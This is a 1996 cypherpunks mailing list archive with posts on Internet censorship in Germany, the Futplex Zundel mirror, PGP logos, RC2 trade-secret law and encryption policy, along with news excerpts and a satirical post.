relatively unknown even to the type of crowd that goes to CFP; this could
be your chance to raise some awareness on these issues, show reporters what
can _really_ be done, and so forth.

If you'd like to demo (or even if you're just thinking about), please send
me mail as soon as possible so we can have time to plan.  Thanks!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Sat, 3 Feb 1996 09:51:32 +0800
To: cypherpunks@toad.com
Subject: Re: PGP "official" logo? (a.k.a. the Return of the Logo Wars)
In-Reply-To: <9602022227.AA01627@ch1d157nwk>
Message-ID: <199602030017.RAA06483@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself "Andrew Loewenstern 
 <andrew_loewenstern@il.us.swissbank.com>" is alleged to 
 have written:
>
> Instead of having another logo war on the mailing list and having to shout  
> over the din of accounts and subjects hitting the bottom of subscriber's kill  
> files, I'll sum it up for you:  If you have a cool logo, put it on your own web  
> pages (or get someone to put it on theirs).  Then post the URL on the mailing  
> list.  If others like it they will use it.  Welcome to anarchy.


Hello Andrew, I recommend that you set your line widths so a
smaller number so that people who quote you, as above, don't
generate >80 col lines, as above.


But anyway, I drew my own PGP logo for my "Bryce's Auto-PGP"
distribution site.  The logo's a kloogey piece of work, but 
I like the motif of an envelope with "PGP" stamped across 
the seal, so I use it.  If anyone else does the same idea
better, I'd love to see (/copy) it.


Anyone is welcome to copy my "PGP- the electronic envelope"
logo, but by doing so you are assenting to this contract,
which states that the next time we are hanging out together
in the same bar you will buy me a beer.


<a href="http://www.c2.org/~bryce/BAP.html"> BAP
Distribution Site </a>


Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRKpfvWZSllhfG25AQH1QwP/SX7UN0QV5OkxHnHQcZRs4c5f9wBb3+Dj
8MzJoIgdEIiiSLZ+dfc3EHiiP4huMtaNzb+E9k2os8gJvU9D3aYR8Lz8bZDKA0kF
dzbCsQAPZoFF+egicd4JTm1KfcfnXJmSModvf6Xoy+L7GdTw5j74tCZNZb9f1GY+
fs6c8XgI3ME=
=pd+E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sat, 3 Feb 1996 10:24:12 +0800
To: jpp@software.net (John Pettitt)
Subject: Re: RSA disappears :-)
In-Reply-To: <2.2.32.19960202212818.016da488@mail.software.net>
Message-ID: <199602030118.RAA22873@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

RSA is fine and up and running as of 5 PM PST on
Friday Feb 1. RSA.COM nameserver at 192.80.211.33
is up and on the net as well as www.rsa.com.

Love

Mark Allyn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 3 Feb 1996 00:43:06 +0800
To: cypherpunks@toad.com
Subject: Police PR Mendacity
Message-ID: <199602021620.RAA05747@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, 2 Feb 1996

Governments around the world are taking action to police
computer networks

By Our Foreign Staff

The US Congress last night passed legislation that
imposes stiff penalties for the distribution of
"indecent" material on the Internet, a global web of
computer networks that can be reached by an estimated 30m
computer users.

The action echoes moves by other leading industrial
countries to bring the Internet under some form of
control. It coincides with a call by French officials for
an international law on communications to deal with
regulation of electronic publishing on the Net.

In Japan, meanwhile, Tokyo police have made what are
believed to be the first arrests in a crackdown on the
distribution of pornography via computer networks.

The rapid growth of the Internet has created widespread
concerns about its use to distribute pornography, racial
hate messages and other offensive materials. However the
vast bulk of material published on the global computer
network is commercial or technical in nature.

The measures passed in the US Congress, which were
attached to a broad Telecommunications Bill, for the
first time place legal limits on the types of materials
that can be distributed via computer networks.

Government intervention is strongly opposed by Internet
pioneers, and by many within the computer industry, who
believe that rapid growth of the Internet and electronic
commerce will be stunted by regulation. Moreover, legal
experts say that the regulation of cyberspace raises
complex issues about jurisdiction because the Internet
carries information across national borders.

In France, the issue has been brought to a head by the
recent publication, on the Internet, of "Le Grand Secret"
(The Big Secret), a book about Francois Mitterrand's
battle with cancer written by Dr Claude Gubler, the late
president's personal physician, which has been banned by
the French courts. Mr Francois Fillon, post and telecoms
minister, said in the French Senate yesterday that he was
to propose to a March meeting of EU culture and telecoms
ministers an international conference to debate a law.

He said the government was creating a working group with
representatives from the ministries of justice, culture
and telecoms, and stressed that his concerns included the
problem of dealing with regulation outside national
boundaries and the difficulty of pursuing those who
abused the system.

He also suggested the possibility of introducing ethical
codes for Internet operators along the lines of those
already in place for the country's Minitel telephone-
based information system.

In Japan, where use of the Internet is growing rapidly,
the legality of publishing pornography on computer
networks is about to be tested in the courts following
the first arrests for allegedly criminal use of the
Internet.

Tokyo police announced that they had arrested a
28-year-old businessman, Mr Hiroshi Kamekura, on
suspicion of distributing pornographic pictures. He is
alleged to have produced the images at home and
distributed them on his home page since last month, said
police. According to Mr Kamekura, the service was popular
and he was asked by other Internet users to produce more
provocative pictures.

Police also arrested a high school student, accused of
distributing pornographic pictures over the Internet
since last September. The arrests may raise eyebrows in
a country where graphic, frequently sadistic pornography,
moderated only by a ban on depictions of pubic hair, is
openly sold on book stalls everywhere.

A German court has already acted to prevent users in that
country from accessing sexually explicit Internet
discussion groups. The court forced Compuserve, a
US-based online information service, to block access to
about 200 of the thousands of "Usenet" groups to be found
on the Internet.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn (206) 860-9454 <allyn@allyn.com>
Date: Sat, 3 Feb 1996 10:18:39 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: FEBRUARY MEETING
In-Reply-To: <Pine.SUN.3.91.960202123454.27662B-100000@crl.crl.com>
Message-ID: <199602030121.RAA22883@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know if there are any meetings in the
Seattle, Washington area?

Mark Allyn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
Date: Sat, 3 Feb 1996 08:31:03 +0800
To: tcmay@got.net
Subject: Re: Futplex makes the news!
In-Reply-To: <ad37cb251902100476f7@[205.199.118.202]>
Message-ID: <9602022229.AA11435@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 2 Feb 1996 15:34:24 -0800
   X-Sender: tcmay@mail.got.net
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   From: tcmay@got.net (Timothy C. May)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   If UMass has yielded, the prominently mentioned CMU and Stanford sites may
   be prompted to exactly the same thing. This will "prove" to the Germans
   that they did the right thing, and be a blow in _favor_ of suppression of
   speech.

I just heard the latest version of this story on WBZ radio here in
Boston.  The report quoted the chairman of the CS dept. at UMass; his
claim is that Futplex's distribution of the material was clearly a
"political act" and thus not an appropriate uses of computing resources
funded by public tax dollars.  The report clearly stated that Futplex's
actions were taken to protest German censorship.

Immediately after this story WBZ reported that Germany is now
investigating AOL for possible distributions of banned material.

					--bal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 3 Feb 1996 08:36:26 +0800
To: cypherpunks@toad.com
Subject: Just what the Internet needs right now...
Message-ID: <01I0QVJK2WDSA0UTJS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I'll try to see if I can find some bomb-making information from a
non-US web site; it may help in counterarguments. Given that I'm still not
that good at searching, it would be nice if someone else could locate it also.
	-Allen

Reuters New Media
   
   _ Friday Febuary 2 4:54 PM EST _
   
Boys Arrested for Plotting Bomb

   
   
   NEW YORK (Reuter) - Three 13-year-old boys have been accused of
   plotting to blow up their school after learning how to build a bomb
   over the Internet, police said Friday.
   
   The boys were arrested Wednesday after other students at Pine Grove
   Junior High School in Minoa, New York, heard rumors of their plans and
   police were alerted, said Capt. William Bleyle of the nearby Manlius
   police department.
   
[...]

   One of the boys, believed to be the ringleader, admitted to police
   that the three eighth graders learned how to build the bomb from
   instructions they found on the Internet, the global network accessible
   from home computers.
   
   ``The information is very easy to find,'' Bleyle said. ''It's at your
   fingertips. They just called it up.''
   
   He said police found diesel fuel, a bag of fertilizer and other items
   -- the basic materials to build a bomb-- at the first boy's house.
   
   The boys found the information using a computer at home, not at
   school, said Gary Minns, superintendent of the East Syracuse-Minoa
   school district, about 250 miles northwest of New York City. The
   school is not hooked up to the Internet but had been considering it,
   he said.
   
   ``It goes way beyond what we would consider a prank,'' Minns said.
   ``Especially from Oklahoma City and the knowledge and awareness of the
   devastation these things can cause, to think they were even
   considering doing this type of thing is extremely disturbing.''
   
[...]

   The three boys had built and tested a bomb in a field behind an
   elementary school, Bleyle said. That bomb caught fire but did not
   explode. All three, who are being charged as juveniles, are accused of
   conspiracy, he said. They have been suspended from school.
   
   Police were still investigating their motives, Bleyle said, adding
   ``It was definitely to effect destruction on the school. It was not an
   idle threat. There was actual intent to carry this through. The
   destruction could have been enormous.''




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Roberts <djr@saa-cons.co.uk>
Date: Sat, 3 Feb 1996 02:20:47 +0800
To: cypherpunks@toad.com
Subject: Psion organisers
Message-ID: <Pine.A32.3.91.960202174152.6243A-100000@haddock.saa-cons.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I was wondering about a couple of things regarding the Psion Series 3a 
personal organisers.  (According to the manual, you have them in the USA 
as well! :)

Firstly, anyone know what kind of encryption is done on documents and 
spreadsheets held on it's internal disk?   It only allows a 10 character 
password, and claims to encrypt the whole file.

Secondly, I presume that as the encryption software is apparently 
embedded into the system (ie cannot be extracted), I won't get arrested 
when I wander through US customs next time.

TIA - Dave.

Dave Roberts        | "Surfing the Internet" is a sad term for sad people.
Unix Systems Admin  | Get a board, find a beach, surf some REAL waves and
SAA Consultants Ltd | get a *real* life.
Plymouth, U.K.      | -=[For PGP Key, send mail with subject of "get pgp"]=-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 3 Feb 1996 01:35:41 +0800
To: cypherpunks@toad.com
Subject: Espionage-enabled Greed
Message-ID: <199602021657.RAA07766@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



To follow up the GNN report on Net espionage and NSA 
sniffing:


For a quick overview of the prime sites for sniffing, see
the informative map of the major US NAP's, routers and
interconnections at:

   http://www.cerf.net/cerfnet/about/interconnects.html


MAE-East, MAE-West, MAE-Chicago and others are detailed
at:

   http://www.mfsdatanet.com:80/MAE/


AltaVista offers more about the Routing Arbiter project -
- for examples, www.ra.net; rrdb.ra.net; rrdb.merit.edu;
isi.com -- as well as about FIX-East and FIX-West, 
various NAP's and the international exchanges and 
routers.


Is there technology for eluding these espionage-enabled
chokepoints -- tunneling, satellite-richochet or 
otherwise?


The newly announced Planet 1 personal satellite phone
system, $2,500 a unit, could it provide secure privacy 
off the heirarchical telecomm throttle? Or, are all
options slowly being shutdown by regulated greed?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 3 Feb 1996 09:19:16 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <ad3801f4040210045a35@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:17 PM 02/02/96, Mike Duvos wrote:
>We seem to be discovering more and more side effects from the
>defense of free speech for the unpopular.  The Holocausta Nostra
>is cheering wildly at the opportunity to present the works of
>Mr. Zundel under a banner reading "Nazi Scum".  Zundelsites are
>being set up by people whose views are so disgusting they probably
>offend even Mr. Zundel himself.  And now our very own "Futplex"
>will have to live the rest of his life branded as a electronic
>distributor of "hate literature" by the forces of political
>correctness at UMASS.
>
>It may be time to regroup and take inventory of what we are
>suposedly trying to accomplish here.

The AP article on the net that someone referenced for us before
(http://www.boston.com/globe/ap/cgi-bin/retrieve?%2Fglobe%2Fapwir%2F033%2Fre
g%2Fag052102), fortunately portrays Futplex M accurately as a principled
free speech crusador, rather then a Nazi, with a few good quotes from F
(nice job Futplex!).     [And Rich Graves should be pleased to see his name
gets mentioned _before_ Declan's.  snork.]   I hope he doesn't get into too
much trouble with UMASS, but I suspect he won't--after he gets called a
"free speech activist" on the AP wire, umass is going to look really bad
punishing him for his activism.   [I guess they've already told him he has
to take it down, but it served it's purpose anyway].

I think the whole endeavor was a resounding success, and I wish I had been
on the ball enough to participate in it.  So, nazi wierdos even worse then
Zundel have appropriated his views--only goes to show that when you try to
censor something (on the net especially--but this has always been true to
some extent, and you can frequently hear ACLU types worthily propagandizing
it), all you do is end up giving it free publicity.  So what if the
'holocost nostra' is delighting in calling Zundel "nazi scum", or whatever.
I haven't read his stuff, so I don't know if I think him deserving of that
title or not, but they can certainly exercise their freedom of speech in
saying so. (Although if they're not careful I suppose Zundel could exercise
his freedom of filing a libel lawsuit against them).

The important thing is that Rich, Declan, Futplex, and anyone else
participating showed the world that censorship on the internet, if not
impossible, is at least a good deal more dificult then people thought.
And,  just as importantly, that they defeated this individual act of
censorship thoroughly.  (Yes, I think participating in the defeat of
censorship is worthy even when it's nazi stuff you're protecting.  A
'banned sites' page on the WWW would be a great thing, even if it contained
a majority of links to neo-nazi propaganda.  If censorship attempts
continue, one of us ought to make such a site--and, of course, mirror it
throughout the universe).

[ Thought--if Germany was blocking sites that contained pornography
instead, not only would Rich/Declan/Futplex probably have been more
reluctant to mirror it, but they probably would have gotten in legal
trouble for doing so, even in the U.S.  And, of course, would have brought
their web servers to a standstill as the entire world tried to get erotic
pictures from their sites.  And the AP article probably wouldn't have been
so kind.   It's ironic and sad that in 1996 America, pictures of people
having sex are more dangerous contraband then is anti-semetic propaganda.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Sat, 3 Feb 1996 10:26:54 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Web page authentication (was: Anti-Nazi Authentication)
In-Reply-To: <Pine.ULT.3.91.960202120722.19670I-100000@Networking.Stanford.EDU>
Message-ID: <199602030123.SAA09872@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


 An entity calling itself "Rich Graves 
 <llurch@networking.stanford.edu>" is alleged to have
 written:
>
> On Fri, 2 Feb 1996, Bryce wrote:
> 
> > > What's wrong with a prominent PGP-signed notice in <PRE>'s that "This
> > > page, at URL [whatever], has a separate PGP signature at [other URL]." 
> > > I've did that with the windows networking FAQ a few times until it just 
> > > got to be too much trouble.
> > 
> > That's a good idea, but I don't see any reason to sign the 
> > notice.
> 
> For the paranoid, it would be an added assurance that they are reading the
> original file at the original location. Otherwise, anybody could copy the
> Web page, modify it, and give it someone else's PGP signature. 


Uhhh- wait a second.  Anybody can always copy the file *and*
the signature to a new site without changing the
authentication.  And anybody can always copy the cleartext
and then sign it with a different key.  Right?  What are you
getting at?


Now what you can do is put the site's URL in the signed 
text, forcing the copier to change the URL and re-sign it
with his own key.  And you could time-stamp your document, 
proving that you had possession of it before the copier did.
But that's the extent of what you can do, AFAIK.


> But yeah, it would look awfully silly, especially to the non-PGP-aware
> public. An unobstrusive PGP logo (below) would be great, and might become
> a status symbol, like those cheesy HTML validation service and Internet
> Audit Bureau logos (which I have used on a few pages). 


Yeah that was my idea.  A little "PGP signed" logo.  If the
user clicks on it it gives them the signature, and/or a href
to a PGP page.  (Probably one maintained by yours truly.)


> Yeah, I like the idea of a standardized logo. A lot.


I have a little logo which is (as I recall) 32x32 pixels
which is just "PGP" with a red check-mark superimposed.
I'll hack on this idea during what I jocularly refer to as
my spare time.


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRK45PWZSllhfG25AQG9uQP/Ry8TJDwvBjgNLjqJ4O0kX5277Th9ERoD
/I90bq+EvdkVOIypr8DIagxGQDtY8GUDeIXzZvvoUSH/h/EioKP7P6J3El9liCmO
NEYcGhlYtnKMn2/iKeQiZfu68iVSCpUSm8Tvq42ecLKTpgcpx+6sQIhFs3e5oG0O
F2lc601FTL4=
=0qGM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 3 Feb 1996 09:23:43 +0800
To: cypherpunks@toad.com
Subject: Gleeful Prosecutors, Happy AOL
Message-ID: <Pine.BSD.3.91.960202182316.6449B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
        A 02 02 96 Associated Press newsstory 
        ------------------------------------- 

  AMERICA ONLINE ADDED TO PROBE OVER INCITING RACISM

                     datelined 
 
    MANNHEIM, Germany (Feb 2, 1996 3:29 p.m. EST) 
 
                     reports: 
 
 
   Prosecutors hoping to ban neo-Nazi material from reaching 
   Internet users in Germany have notified America Online Inc. 
   that it may be charged with inciting racial hatred. 
 
  and of course... 
 
   America On-Line spokesman Ingo Reese in Hamburg said his 
   company also was happy to work with the prosecutors. 
 
 
  Cordially, 
 
  Jim 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Sat, 3 Feb 1996 11:24:32 +0800
To: cypherpunks@toad.com
Subject: crypto/classification
Message-ID: <199602030232.SAA06904@well.com>
MIME-Version: 1.0
Content-Type: text/plain


A few weeks ago someone posted the following message:

From: nobody@tjava.com (Anonymous)
Date: Wed, 10 Jan 1996 22:30:55 -0600
Subject: Cryptology and classification

Hi all,

Just received a memo, the "Desk Reference Guide" to Executive Order 12958.
This memo/executive order discusses classified national security
information.  The cypherpunks-interesting aspect of this memo lies in
exceptions to some new guidelines.  Basically, this executive order
removes the authority for the government to "permanently" classify
information.  Basically, classification is now limited to 10 years
(or 25 years in some special cases).  The exceptions to this allow
classification for longer durations for certain types of material.
These types include things like protecting intelligence sources and 
nuclear weapons design info.  One of the other exeptions is for:

"...information that would impair United States cryptologic systems
or activities."

This appears to be taken directly from the executive order, so these
types of decisions are being made at high levels.  Thought you might
be interested.

        Hooker

I'm curious whether the "desk reference" contains more than the mere text
of the Executive Order.  If it does, I'd like to get a copy, since the FOIA
cases I handle typically involve classified information.

Please reply personally, since I only read the list in digest form.

Thanks!
Lee Tien






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Sat, 3 Feb 1996 11:30:48 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption and the 2nd Amendment
Message-ID: <199602030233.SAA07384@well.com>
MIME-Version: 1.0
Content-Type: text/plain


I agree that a 2nd A. argument is legally worthless; so do Mike Godwin and
other persons whose legal opinions are generally carefully considered.  

FWIW, I note that one gov't study of the constitutionality of encryption
restrictions, done by some law profs for DOEnergy, had a section surveying
the possible applicability of the 2nd A.  Since we are not using this
argument in Bernstein, I didn't read the section with any care.  The thrust
was, if I recall correctly, that even if the 2nd A did apply, it has so
little force that it doesn't matter (i.e., one can't easily point to
doctrine calling for "heightened" or "strict" scrutiny under the 2nd; I
happen to believe that there should be some form of scrutiny beyond
"rational basis" for infringement of 2nd A. rights, having been impressed
by Sanford Levinson's analysis, but the cases do not support it).

I suspect that one reason why folks find this approach rhetorically
interesting is that it's got that "you called it that, so . . . " flavor. 
In a different post on a different issue, Perry Metzger referred to
estoppel, and I think the same intuition operates here. But as Michael
Froomkin said, what the State Department calls it shouldn't be relevant to
the meaning for constitutional purposes.  Also, estoppel against the
government is quite limited.  There's a line of cases saying that, and
courts frequently refuse to hold the government to the same kind of
estoppel as private parties.  (Agreeing w/Peter Junger)

Lee Tien

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Sat, 3 Feb 1996 11:38:10 +0800
To: cypherpunks@toad.com
Subject: Re:  RC2 Source Code - Legal Warning from RSADSI
Message-ID: <199602030235.SAA08181@well.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't practice intellectual property law, but I think y'all should be
careful, legally speaking.  Without more facts, you don't know if the
purported disassembly was lawful.  


>From: Rich Salz <rsalz@osf.org>
>Date: Thu, 1 Feb 1996 19:46:50 -0500
>Subject: Re:  RC2 Source Code - Legal Warning from RSADSI
>
>Once lost, trade secret can never be regained.  The person(s) responsible
>can be sued so they never work again :), but it's unclear if RSA can
>stop anyone using unpublished trade-secret source.
>
>At any rate, I'll stop my comparison of the distributed RC2 and the 
>licensed RC2 since RSA's done it for us. :)
>        /r$

I think the first and second sentences don't map.  It's true that once a
trade secret is "lost," it's lost (though I suppose if everyone forgets it
and someone rediscovers and protects it it's regained).

But you must distinguish between *legally* lost and merely practically
disseminated.  Trade secrecy is not complete or real secrecy.  If I were
under NDA to RSA to keep RC2 secret, passed it on to Rich, and RC2 met the
legal test for trade secrecy, it is still a trade secret in the law.  I
don't recall the remedies, but I'm fairly sure that if Rich has the right
level of knowledge/notice, he's not immune.

>From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
>Date: Thu, 1 Feb 96 21:06:12 -0500
>Subject: Re: RC2 Source Code - Legal Warning from RSADSI
>
>   Date: Thu, 1 Feb 1996 18:26:15 -0500
>   Mime-Version: 1.0
>   Content-Type: text/plain; charset="us-ascii"
>   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
>   Sender: owner-cypherpunks@toad.com
>   Precedence: bulk
>
>   Now, copyright might be another matter.    But you can't copyright an
>   algorithm, only specific text in fixed form (ie, the source code).  So this
>   would mean you couldn't use the particular code posted to sci.crypt, but
>   wouldn't stop anyone from using the algorithm, if they wrote their own code
>   (to be safe, without having seen the RSA-copyrighted code, only having the
>   algorithm described to them by someone else).   
>
>If the source code posted to sci.crypt was in fact a copy of an RSADSI
>copyrighted soure code listing, then making copies of that listing is a
>copyright violation.  However, copyright protection does not extend to
>the underlying algorithm, so unless RSADSI has a patent on the algorithm
>the idea is free, and can be reimplemented using a "clean room" or
>"Chinese wall" approach.  If the posted source code was *not* a copy of
>RSADSI source code but instead produced by disassembling object code
>RSADSI's claims are tenuous at best.  RSADSI could conceivably claim
>that the disassembled code is a derivative product of their copyrighted
>object code, but I think they would have a hard time distinguishing
>themselves from the facts in _Sega v. Accolade_.
>
>I fail to see how the legality of "alleged-RC2" is any different than
>that of the "alleged-RC4" code which was published last year.
>
>                                                --bal

Trade secrecy is separate from either copyright or patent.  It covers both
patentable and nonpatentable stuff.  Its great advantage is its potential
duration -- so long as it's not independently generated or
reverse-engineered.  Its great drawback is it's hard to maintain.  

I think Brian is right in what he said, but the critical qualification is
how the posted source code was produced.  One could have a trade secret in
the algorithm; Sega v. Accolade only addresses the copyright issues, if
memory serves.  The Ninth Circuit found that the dissassembly was
infringement, because it involved copying of the protected expression, but
excused the infringement based on "fair use."  *** Keep in mind that fair
use is multifactor, and the Sega decision expressly noted that Accolade was
only trying to achieve compatibility, only indirectly harming the market
for Sega's videogames.  This alone might distinguish disassembly to get RC2
source in order to put RC2 "out there," even from a copyright perspective.

What's unclear in the law is RSA's power to control dissassembly by
contract.  Traditionally, reverse engineering has always been a legitimate
means of penetrating trade secrecy.  The problem arises, though, if one
agrees not to reverse-engineer.  If I got an RSA product and agreed not to
disassemble and not to disclose anything I might happen to discover, then I
have a contractual, not statutory, duty.  This is like the shrink-wrap
license issue:  if I buy Lotus Notes, a shrink-wrap "no dissassembly"
provision may well be unenforceable.  Such a provision is more likely
enforceable in a truly bargained contract.  This is all contract law.

So if the person who disassembled was under a contractual bar, disassembly
could be misappropriation.  (I'm not clear on current misappropriation law,
which is in a statute in California if I recall.)

I'm not really up on all this, and it's very fact-sensitive, but I don't
think the legal issues are very simple, and I would counsel some caution. 
Are those enough qualifications and disclaimers?  

Lee






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 3 Feb 1996 09:41:50 +0800
To: cypherpunks@toad.com
Subject: Re: Futplex makes the news!
Message-ID: <v02120d04ad38431da99a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:34 PM 2/2/96, Timothy C. May wrote:
>(Did I hear correctly that Futplex has "volunteered" to perform 500 hours
>of community service at the Simon Wiesenthal Center's Boston office? And
>that he has volunteered to attend 50 hours of sensitivity training? Or am
>thinking of Cornell?)

Ah.

I think what Tim's referring to is the brand new Reeducation Campz, Inc.
(RCI), "NewCommonwealth" facility currently taking on new "HappyCampers" in
Cambridge just up Brattle Street from Harvard Square.  I hear it's a
complete appropriate-behavior Skinnerian-behavior-modification
aversion-therapy facility complete with electroshock contour couches in
front of surplus Digital Equipment Corporation MicroVaxen, all running a
special version of CuttyBrowser, specially developed in COBOL for the
MicroVaxen by Mitre and Micotronx. When the wrong URLs are selected (EF*,
Cyph*, crypt*, White_W*, and "Black Rhino", to name a few grep strings),
the camper is randomly electrocuted at senstitive subcutaneous nerve
endings or gassed with nauseous sulpher fumes.

This technology, along with direct neural stimulation of pleasure centers
when Significant Figures of National Authority (SFNA) (including the First
Lady, the FBI Director, and the Attorney General), are randomly flashed,
although slowly, on the MicroVax's screen has proven very powerful in
creating extremely motivated and happy citizens of the Commonwealth.

An interesting side effect is that the process creates sexual arousal when
the HappyCampers see the company logo of the computer outside of the Camp
setting, which is apparently why the machines in this particular facility
were donated by Digital under a "Help the Commonwealth Grow" program,
reserved for Massachusetts computer companies. Digital is hoping that this
will help stanche the decline in sales they've been suffering the last few
years, or at least help get rid of a "very large" production run of
MicroVax computers they've been writing off for the last eight years.

RCI, a "hybrid" for-profit corporation owned by government/non-profit
organizations, is a partnership between the NSA, both NEAs, NOW, NARAL, The
Moral Majority, Oral Roberts University, The 700 Club, and, of course,
UMASS in cooperation with the Kennedy School of Government at Harvard.
After the camp, the HappyCamper is charged $37,000 in tuition for the
12-day 19-hour-a-day experience, is also required to pay for the computer
(because the campers tend to become emotionally distraught when separated
from the machines, and because nobody can be hired to clean the machines
either), and, is required to recruit 4 other campers.

Oddly enough, this last requirement has become something of a problem,
because graduates of the Camp are usually overzealous in their recruitment
efforts, dragging relatives, farm animals, and, in several cases,
inebriated homeless residents of Harvard Square to the Camp and leaving
them in unconscious piles at the Camp door. This is causing problems with
neighbors in the Brattle Street area, including John Kenneth Galbraith and
Governor William Weld, who are not now very happy campers at all. The Camp
is now required to give the neighborhood association 24 hour advanced
notice of every graduation, so that gardeners and domestic help can be
locked safely indoors.


Anyway, have fun, Futplex!  Remember that I've moved, and don't forget your
Kleenex when you go...

Better yet, stay in Ithaca.


Cheers,
Bob Hettinga

Ithaca? That's Cornell, right? Hmmmm... How about moving to New Haven, instead?

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 3 Feb 1996 09:37:56 +0800
To: cypherpunks@toad.com
Subject: Going, Going, Gone With the Flow
Message-ID: <Pine.BSD.3.91.960202185629.6449C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
            A 02 02 96 Boston Globe newsstory 
            --------------------------------- 

     GOVERNMENTS MOVE TO LIMIT FREE FLOW OF THE INTERNET 

                       datelined 
 
             (Feb 2, 1996 00:17 a.m. EST) 

                       reports: 
 
 
    ...the Internet is slowly being colonized. 
 
 
  Colonized? 
 
    Governments around the world -- from Germany to Iran to 
    Singapore -- are moving to limit Internet access for their 
    citizens.... 
 
 
  Oh I see.  Colonized by parasites. 
 
    This move to cordon off the Internet into private plots -- 
    some call it digital Balkanization -- is seen by experts as 
    one of the most profound changes since the global network 
    emerged as a commercial medium in 1991. 
 
 
  S-s-h-h.  The experts speak! 
 
    Many Internet specialists say it marks the shift...to [a 
    "network"] where users are building nation states, an evo- 
    lution that they say will lead to the Internet's ultimate 
    success as a commercial and communication platform. 
 
 
  S-s-h-h!  The specialists have spoken. 
 
 
    Earlier this week, Federico Mayor, the director of UNESCO, 
    an arm of the United Nations, called for the drafting of a 
    global agreement that would help protect rights in cyber- 
    space. 
 
 
  Mais oui. 
 
 
  Cordially, 
 
  Jim 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 3 Feb 1996 23:43:33 +0800
To: cypherpunks@toad.com
Subject: Germany investigates AOL for providing Zundelaccess
Message-ID: <gl4eqA_00YUtIdKxVq@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


German prosecutors appear to be using the *threat* of charges to force
AOL and CompuServe to block access to web sites. I suspect they'd rather
not actually file formal charges...

This is escalation. Faced with criminal charges for "inciting racial
hatred" or with enraged customers if they block access to web servers in
the U.S., what will AOL do? Try to block by URL?

-Declan

-----------------------------------------------------------------------

February 2, 1996

